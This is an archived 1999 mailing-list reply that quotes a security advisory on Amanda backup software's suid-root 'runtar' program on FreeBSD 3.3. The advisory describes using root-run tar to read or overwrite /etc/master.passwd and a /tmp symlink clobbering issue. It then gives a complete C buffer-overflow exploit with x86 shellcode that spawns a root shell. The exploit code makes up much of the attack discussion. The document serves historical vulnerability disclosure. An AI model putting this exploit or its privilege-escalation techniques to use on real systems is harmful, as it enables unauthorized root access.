hi, I confirmed a few exploitable buffer overflows in multiple suid's on an earlier version of amanda on BSDI as well a while back. As I recollect 'runtar' was one of them. I apologize that I cant provide anything more specific than this, but it was some time ago and I misplace my notes on it. Your post spurred my memory so I figured I'd mention it. -eric On Sat, 30 Oct 1999, Tellier, Brock wrote: > Greetings, > > OVERVIEW: > The Amanda backup package has a several vulnerabilities which > will allow any user to gain root privs. > > BACKGROUND: > My tests were done ONLY on FreeBSD 3.3-RELEASE, though this is almost > certainly not the only vulnerable OS. A search for "amanda-2 and not > freebsd" on altavista yields preliminary, unconfirmed data that some of > the vulnerable OS's (based on packages that are included on install > CD's, anyone can install Amanda to make themselves vulnerable) may be: > RedHat ?.?, TurboLinux, PowerTools CD, SuSE 6.2 Confirmation on which > OS's/tar's are vulnerable would be useful. > > DETAILS: > > Amanda's "runtar" program, suid root by default on FreeBSD 3.3, calls > /usr/bin/tar and passes all args given to runtar to this program. Tar is > > thus run with root permissions and is vulnerable to all of the same > attacks on suid programs that it would have if it were suid itself. > > Vuln #1 - run tar as root > > Since tar is run with root permissions, you are free to tar up any file > you wish, including /etc/master.passwd. You may also untar any file you > > wish, to any location on the system, including /etc/master.passwd. This > > does not require any exploit kung-fu and may be done by supplying args > to tar/runtar as if you were root. > > Vuln #1.1 - tar contains a buffer overflow > > Obtaining root via buffer overflow here is redundant, of course, but it > illustrates the point that even if tar's capabilities weren't able to > gain root > privs, the buffer overflow would still allow you to do so. An overflow > exists *IN TAR* which will allow any user to execute commands as root. > Note that an overflow in tar isn't an immediate security flaw > since it is never suid/sgid, but it goes to show that one should do > security audits of all the programs one calls with user input. By > passing > a long string to runtar in the form "/usr/local/libexec/amanda/runtar > cvf > $400bytes:bah" we can execute our commands. FreeBSD exploit attached > below. > > Vuln #2 - symlink problem > > Not quite as serious, but a concern nonetheless. When the amandad > daemon > is run, a bin-owned file called "amandad.debug" in /tmp. By creating > a symlink from /tmp/amandad.debug to any other file, we will force > amandad > to clobber the contents with that of amandad's debug info. Note that > amandad is not suid/sgid, but it is often run with root perms at startup > > or via scripts. > > WHO IS VULNERABLE: > Anyone running a suid version of runtar should be suspicious. I've not > tested any other O.S.'s except FreeBSD 3.3, which includes amanda 2.3.0 > and 2.4.1 as "additional packages" on the install CD and tar-1.11.2. > > > EXPLOIT: > > /* > * Amanda runtar exploit yields euid=0(root) > * Actually overflows tar 1.11.2 (included in FreeBSD 3.3) > * Tested on FreeBSD 3.3, modify shell/addr/dir for Amanda/tar on other > * platforms > * > * Compile gcc -o amandax amandax.c > * Run ./amandax <offset> <buflen> > * keep buflen around 400, try positive and negative offsets > * > * Brock Tellier btellierat_private > */ > > > #include <stdlib.h> > #include <stdio.h> > > char fbsdshell[]= /* mudgeat_private */ > "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" > "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" > "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" > "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh"; > > > #define LEN 400 > #define NOP 0x90 > #define ALIGN 3 > #define OFFSET 0 > #define ADDR 0xbfbfdd90 /* fbsd 3.3 */ > > int main(int argc, char *argv[]) { > > long int offset=OFFSET; > > int i; > int buflen = LEN; > long int addr = ADDR; > char buf[LEN]; > > if (argc > 1) offset = atoi(argv[1]); > if (argc > 2) buflen = atoi(argv[2]); > if (argc > 3) { > fprintf(stderr, "Usage: %s <offset> <buflen>"); > exit(0); > } > > fprintf(stderr, "Amanda runtar exploit for FreeBSD 3.3\n"); > fprintf(stderr, "Brock Tellier btellierat_private\n"); > fprintf(stderr, "Using addr: 0x%x\t buflen: %d\t offset: %d\n", > addr+offset, buflen, offset); > > memset(buf,NOP,buflen); > memcpy(buf+100,fbsdshell,strlen(fbsdshell)); > for(i= 100 + strlen(fbsdshell)+ALIGN;i<buflen-4;i+=4)*(int > *)&buf[i]=addr+offset; > > execl("/usr/local/libexec/amanda/runtar", "runtar","cvf", buf, ":bah", > NULL); > > exit(0); > } > > Brock Tellier > UNIX Systems Administrator > Chicago, IL, USA >
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:09:22 PDT